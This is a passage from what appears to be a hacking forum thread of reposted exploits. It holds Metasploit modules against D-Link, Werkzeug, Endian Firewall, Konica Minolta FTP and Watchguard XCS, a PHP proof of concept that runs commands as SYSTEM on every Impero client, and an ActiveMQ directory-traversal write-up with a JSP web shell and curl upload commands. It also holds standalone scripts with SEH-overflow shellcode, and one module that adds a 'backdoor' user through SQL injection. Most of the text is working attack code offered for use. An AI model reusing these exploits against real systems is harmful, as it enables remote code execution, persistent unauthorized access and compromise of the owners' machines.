is embedded into a command line the following: # `/opt/bin/perl /home/seos/system/call_webservice.pl $aid oauth_ws.php verify_access_token '$token' '$scope'`; token = "';#{payload.encoded};echo '" uri = '/tws/getStatus' # Other exploitable URLs: # * /seos/find.api (works with no other changes to this module) # * /seos/put.api (requires some hoop jumping, upload) # * /seos/mput.api (requires some hoop jumping, token && upload) print_status("Sending request for #{uri}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'transaction_id' => rand(0x100000000), 'oauth_token' => token }}) if res && res.code == 200 && res.body.to_s =~ /"result_msg":"Success","transaction_id":"/ print_status("Valid response received...") else if res print_error("Unexpected reply from the target: #{res.code} #{res.message} #{res.body}") else print_error("No reply received from the target") end end handler end end
  10. mohammad_ghazei

    Hacking

    /* If you're unsure what Impero is, it's essentially a corporate/educational RAT. Vendor site: https://www.imperosoftware.co.uk/ They recently were in the news about how they implemented "anti-radicalisation" shit or something. They had a booth at BETT back in January. They gave out donuts. Those were nice. Unfortunately, when I asked about their security, nobody answered me. Some reversing later, looks like Impero is completely pwned amirite. The proprietary Impero protocol on the wire is encrypted. With AES-128 CBC. And a hardcoded key and iv that are both derived from sha512(Imp3ro). ISO10126 padding is used. After connection, a client must authenticate. This is done by sending "-1|AUTHENTICATE\x02PASSWORD". Not even joking here. "PASSWORD" is a seperate string though, so it might be different for some special clients maybe. No idea. Then, we have full range to do whatever we want. My PoC also does negotiatiation, but I'm not sure if that's needed. We can get a list of clients with the "SENDCLIENTS" command, then send all the IDs to "SENDCOMMANDMSG" (run CLI command as SYSTEM), or OPENFILE (run visibly an EXE under whatever user, including SYSTEM), or other protocol commands, etc. There's an OSX version, but I haven't properly looked into that. Run my PoC with the right args and it pops calc on every Windows client as SYSTEM. It also runs "whoami > c:\lol.txt", also as SYSTEM. This second one gets logged serverside, but the server logs it as "unknown" as it doesn't know what client did it. Basically, if you use Impero, please don't. Oh yeah -- free speech for the win... internet censorship is <insert some expletives here>, and so are any and all RATs. - slipstream / RoL^LHQ - @TheWack0lian PoC code follows. In PHP because lol. PoC works on at least 5.x (latest). */ <?php // Impero Education Pro SYSTEM-RCE PoC // by slipstream/RoL^LHQ // greets to everyone in lizardhq! :) function PadString($str) { $size = 16; $pad = $size - (strlen($str) % $size); $padstr = ''; for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255)); return $str.$padstr.chr($pad); } function UnPadString($str) { return substr($str,0,-(ord(substr($str,-1)))); } function CryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv); return $crypted; } function DecryptString($str) { $hash = hash('sha512','Imp3ro',true); $key = substr($hash,0,0x20); $iv = substr($hash,0x20,0x10); return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv)); } function SendNetwork($h,$str) { global $socketid; $crypted = CryptString($socketid."|".$str); socket_write($h,strlen($crypted).'|'.$crypted); return; } function RecvNetwork($h) { $len = ''; $chr = ''; do { $len .= $chr; $chr = socket_read($h,1); } while ($chr != '|'); $len = (int)($len); if ($len < 1) die("Something's wrong. Length isn't an int."); socket_set_block($h); $crypted = socket_read($h,$len); $dec = DecryptString($crypted); global $socketid; $dec = explode('|',$dec,2); if ($socketid == -1) $socketid = $dec[0]; return $dec[1]; } function Connect($host,$port = 30015) { echo "Connecting..."; $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); socket_set_block($h); if ((!$h) || (!socket_connect($h,$host,$port))) { echo "failed.\n"; return false; } echo "done!\nAuthenticating..."; // authenticate SendNetwork($h,"AUTHENTICATE\x02PASSWORD"); echo "done!\nWaiting for response..."; // we should get "AUTH:OK" back $data = RecvNetwork($h); if ($data != "AUTH:OK") { echo "authentication failed.\n"; return false; } echo "authentication succeeded!\nNegotiating..."; SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea"); // we get sent 4 loads of packets. discard all. for ($i = 0; $i < 4; $i++) { RecvNetwork($h); usleep(500000); } //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN"); echo "done!\n"; return $h; } function GetAllClients($h) { $pline = "SENDCLIENTS\x01604\x011\x010\x02"; echo "Getting all clients..."; SendNetwork($h,$pline); $data = RecvNetwork($h); // grab the base64 blob $data = array_pop(explode("\x02",$data)); // unbase64 and uncompress $data = gzdecode(base64_decode($data)); $ret = array(); foreach (explode("\r\n",$data) as $line) { // we only care about clientIDs $ret[] = array_shift(explode("\x03",$line)); } echo "done!\n"; return $ret; } function RunCmd($h,$ids,$cmdline) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline; echo "Sending evil RunCMD data..."; SendNetwork($h,$pline); echo "done!\n"; // if this was a real proper negoiated client we'd get something back // however, we aren't, and we're masquerading as client #0; thus, we don't. // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :) } function RunExeAsSystem($h,$ids,$exe) { global $socketid; $ids = implode(',',$ids); $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password"; echo "Sending evil RunEXE data..."; SendNetwork($h,$pline); echo "done!\n"; // we don't get a response from this one } function FindImperoServer($if,$addr) { $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP); socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1); socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if); $str = "ARE_YOU_IMPERO_SERVER"; socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016); socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0)); $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port); if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip; return false; } $socketid = -1; echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n"; if ($argc < 2) { echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n"; echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n"; echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n"; echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n"; die(); } array_shift($argv); foreach ($argv as $key=>$arg) { $detected = false; if ($arg == "detect") { if ($key + 2 >= count($argv)) continue; echo "[*] Finding Impero server...\n"; $arg = FindImperoServer($argv[$key+1],$argv[$key+2]); if ($arg == false) die("[-] Cannot find Impero server\n"); echo "[+] Found Impero server at ".$arg."\n"; $detected = true; } $h = Connect($arg); if ($h === false) continue; $clients = GetAllClients($h); RunExeAsSystem($h,$clients,"calc"); RunCmd($h,$clients,"whoami > C:\lol.txt"); echo "\n"; if ($detected) die(); }
  11. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link Cookie Command Execution', 'Description' => %q{ This module exploits an anonymous remote upload and code execution vulnerability on different D-Link devices. The vulnerability is a command injection in the cookie handling process of the lighttpd web server when handling specially crafted cookie values. This module has been successfully tested on D-Link DSP-W110A1_FW105B01 in emulated environment. }, 'Author' => [ 'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # vulnerability discovery and initial PoC 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'References' => [ ['URL', 'https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110'] # blog post including PoC ], 'DisclosureDate' => 'Jun 12 2015', 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'MIPS Little Endian', # unknown if there are LE devices out there ... but in case we have a target { 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE } ], [ 'MIPS Big Endian', { 'Platform' => 'linux', 'Arch' => ARCH_MIPSBE } ] ], 'DefaultTarget' => 1 )) end def check begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET' }) if res && res.headers["Server"] =~ /lighttpd\/1\.4\.34/ return Exploit::CheckCode::Detected end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Unknown end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Uploading stager ...") @counter = 1 execute_cmdstager( :flavor => :echo, :linemax => 95 # limited by our upload, larger payloads crash the web server ) print_status("#{peer} - creating payload and executing it ...") (1 .. @counter).each do |act_file| # the http server blocks access to our files ... we copy it to a new one # the length of our command is restricted to 19 characters cmd = "cp /t*/#{act_file} /tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "chmod +x /tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "/tmp/#{act_file+@counter}" execute_final_command(cmd) cmd = "rm /tmp/#{act_file}" execute_final_command(cmd) cmd = "rm /tmp/#{act_file+@counter}" execute_final_command(cmd) end end def execute_command(cmd,opts) # upload our stager to a shell script # upload takes quite long because there is no response from the web server file_upload = "#!/bin/sh\n" file_upload << cmd << "\n" post_data = Rex::MIME::Message.new post_data.add_part(file_upload, nil, "binary", "form-data; name=\"#{rand_text_alpha(4)}\"; filename=\"#{@counter}\"") post_data.bound = "-#{rand_text_alpha(12)}--" file = post_data.to_s @counter = @counter + 1 begin send_request_cgi({ 'method' => 'POST', 'uri' => "/web_cgi.cgi", 'vars_get' => { '&request' =>'UploadFile', 'path' => '/tmp/' }, 'encode_params' => false, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => file }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def execute_final_command(cmd) # very limited space - larger commands crash the webserver fail_with(Failure::Unknown, "#{peer} - Generated command for injection is too long") if cmd.length > 18 begin send_request_cgi({ 'method' => 'GET', 'uri' => "/", 'cookie' => "i=`#{cmd}`" }, 5) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
  12. I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality. I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter. An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution. Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes: <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping"> <property name="constraint" ref="securityConstraint"> <property name="pathSpec" value="/api/*,/admin/*,*.jsp"> </property></property> </bean> Effectively blocking the upload of JSP files into contexts that will allow them to execute. I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials: $ cat jetty-realm.properties hacker: hacker, admin $ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties This seems to have the disadvantage of requiring a reboot of the server to take effect. I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot. The attacker can then take a standard JSP shell: $ cat cmd.jsp <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context: $ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp And pop a calc on the server: $ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe Exploiting non-Windows servers All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked. That said, clients can specify the uploadUrl for a blob transfer, e.g.: tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers. Resolution The ActiveMQ project has released an advisory and patches. This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind. It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
  13. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Werkzeug Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing. Tested against: 0.9.6 on Debian 0.9.6 on Centos 0.10 on Debian }, 'Author' => 'h00die <mike[at]shorebreaksecurity.com>', 'References' => [ ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger'] ], 'License' => MSF_LICENSE, 'Platform' => ['python'], 'Targets' => [[ 'werkzeug 0.10 and older', {}]], 'Arch' => ARCH_PYTHON, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'URI to the console', '/console']) ], self.class ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']) ) # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67 if res && res.body =~ /Werkzeug powered traceback interpreter/ return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end def exploit # first we need to get the SECRET code res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']) ) if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/ secret = $1 vprint_status("Secret Code: #{secret}") send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(datastore['TARGETURI']), 'vars_get' => { '__debugger__' => 'yes', 'cmd' => payload.encoded, 'frm' => '0', 's' => secret } ) else print_error('Secret code not detected.') end end end
  14. #!/usr/bin/python # # FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution # # Author: Naser Farhadi # # Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit) # # Link : http://sourceforge.net/projects/fhfs/ # # Description : FHFS is a FTP and HTTP Web Server package, # transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website, # good for schools, businesses, etc. whose students/employees need to easily transport files. # Usage: # chmod +x FHFS.py # ./FHFS.py # # Video: http://youtu.be/ch5A2bQEB0I ## import socket url = raw_input("Enter URL : ") try: while True: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((url, 80)) cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ") req = "GET /?{.exec|"+cmd+".}" req += " HTTP/1.1\r\n\r\n" sock.send(req) sock.close() print "Done!" except KeyboardInterrupt: print "Bye!"
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Endian Firewall Proxy Password Change Command Injection', 'Description' => %q{ This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd (which changes the password for the Linux root account on the system to the value specified by console input once it is executed). The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth credentials as well to exploit this vulnerability. Use the USERNAME and PASSWORD advanced options to specify these values if required. Versions >= 3.0.0 still contain the vulnerable code, but it appears to never be executed due to a bug in the vulnerable CGI script which also prevents normal use (http://jira.endian.com/browse/UTM-1002). Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug (http://bugs.endian.com/print_bug_page.php?bug_id=3083). Tested successfully against the following versions of EFW Community: 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2. Should function against any version from 1.1 RC5 to 2.2.x, as well as 2.4.1 and 2.5.x. }, 'Author' => [ 'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module ], 'References' => [ ['CVE', '2015-5082'], ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'], ['EDB', '37426'], ['EDB', '37428'] ], 'Privileged' => false, 'Platform' => %w{ linux }, 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 10443 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015', 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', '/cgi-bin/chpasswd.cgi']), OptString.new('EFW_USERNAME', [true, 'Valid proxy account username for the target system']), OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']) ], self.class) register_advanced_options( [ OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5]) ], self.class) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, " + "please select a native payload") end execute_cmdstager(:linemax => 200, :nodelete => true) end def execute_command(cmd, opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") req(cmd) end def req(cmd) sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};" post_data = Rex::MIME::Message.new post_data.add_part('change', nil, nil, 'form-data; name="ACTION"') post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"') post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"') post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"') post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"') post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"') data = post_data.to_s boundary = post_data.bound referer_url = "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + "#{datastore['TARGETURI']}" res = send_request_cgi( { 'method' => 'POST', 'uri' => datastore['TARGETURI'], 'ctype' => "multipart/form-data; boundary=#{boundary}", 'headers' => { 'Referer' => referer_url }, 'data' => data }) if res if res.code == 401 fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Received a 401 HTTP response - " + "specify web admin credentials using the USERNAME " + "and PASSWORD advanced options to target this host.") end if res.code == 404 fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Received a 404 HTTP response - " + "your TARGETURI value is most likely not correct") end end end end
  16. # Title: MS15-100 Windows Media Center Command Execution # Date : 11/09/2015 # Author: R-73eN # Software: Windows Media Center # Tested : Windows 7 Ultimate # CVE : 2015-2509 banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner command = "calc.exe" evil = '<application run="' + command + '"/>' f = open("Music.mcl","w") f.write(evil) f.close() print "\n[+] Music.mcl generated . . . [+]"
  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow', 'Description' => %q{ This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. }, 'Author' => [ 'Shankar Damodaran', # stack buffer overflow dos p.o.c 'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'EBD', '37908' ] ], 'Privileged' => false, 'Payload' => { 'Space' => 1500, 'BadChars' => "\x00\x0a\x2f\x5c", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 SP1 x86', { 'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll 'Offset' => 1037 } ] ], 'DisclosureDate' => 'Aug 23 2015', 'DefaultTarget' => 0)) end def check connect disconnect if banner =~ /FTP Utility FTP server \(Version 1\.00\)/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit connect_login buf = rand_text(target['Offset']) buf << generate_seh_record(target.ret) buf << payload.encoded buf << rand_text(3000) print_status("Sending exploit buffer...") send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string handler disconnect end end
  18. # Title: Konica Minolta FTP Utility - Remote Command Execution # Date : 20/09/2015 # Author: R-73eN # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows XP SP3 # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Every command is vulnerable to buffer overflow. import socket import struct shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f" shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29" shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f" shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3" shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92" shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe" shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3" shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a" shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff" shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9" shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18" shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc" shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60" shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba" shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53" shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a" shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3" shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65" banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner nSEH = "\xEB\x13\x90\x90" SEH = struct.pack('<L',0x1220401E) evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) print '[+] https://www.infogen.al/ [+]'
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Watchguard XCS Remote Command Execution', 'Description' => %q{ This module exploits two separate vulnerabilities found in the Watchguard XCS virtual appliance to gain command execution. By exploiting an unauthenticated SQL injection, a remote attacker may insert a valid web user into the appliance database, and get access to the web interface. On the other hand, a vulnerability in the web interface allows the attacker to inject operating system commands as the 'nobody' user. }, 'Author' => [ 'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf'] ], 'Platform' => 'bsd', 'Arch' => ARCH_X86_64, 'Privileged' => false, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Watchguard XCS 9.2/10.0', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 29 2015' )) register_options( [ OptString.new('TARGETURI', [true, 'The target URI', '/']), OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']), OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']), OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]), Opt::RPORT(443) ], self.class ) end def check #Check to see if the SQLi is present res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'), 'cookie' => "sid=1'" }) if res && res.body && res.body.include?('unterminated quoted string') return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit # Get a valid session by logging in or exploiting SQLi to add user print_status('Getting a valid session...') @sid = get_session print_status('Successfully logged in') # Check if cmd injection works test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id') unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534') fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable') end # We have cmd exec, stand up an HTTP server and deliver the payload vprint_status('Getting ready to drop binary on appliance') @elf_sent = false # Generate payload @pl = generate_payload_exe if @pl.nil? fail_with(Failure::BadConfig, 'Please select a native bsd payload') end # Start the server and use primer to trigger fetching and running of the payload begin Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error end end def attempt_login(username, pwd_clear) #Attempts to login with the provided user credentials #Get the login page get_login_hash = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/login.spl') }) unless get_login_hash && get_login_hash.body fail_with(Failure::Unreachable, 'Could not get login page.') end #Find the hash token needed to login login_hash = '' get_login_hash.body.each_line do |line| next if line !~ /name="hash" value="(.*)"/ login_hash = $1 break end sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || '' if login_hash == '' || sid_cookie == '' fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie') end login_post = { 'u' => "#{username}", 'pwd' => "#{pwd_clear}", 'hash' => login_hash, 'login' => 'Login' } print_status('Attempting to login with provided credentials') login = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/login.spl'), 'method' => 'POST', 'encode_params' => false, 'cookie' => "sid=#{sid_cookie}", 'vars_post' => login_post, 'vars_get' => { 'f' => 'V' } }) unless login && login.body && login.body.include?('<title>Loading...</title>') return nil end sid_cookie end def add_user(user_id, username, pwd_hash, pwd_clear) #Adds a user to the database using the unauthed SQLi res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'), 'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, 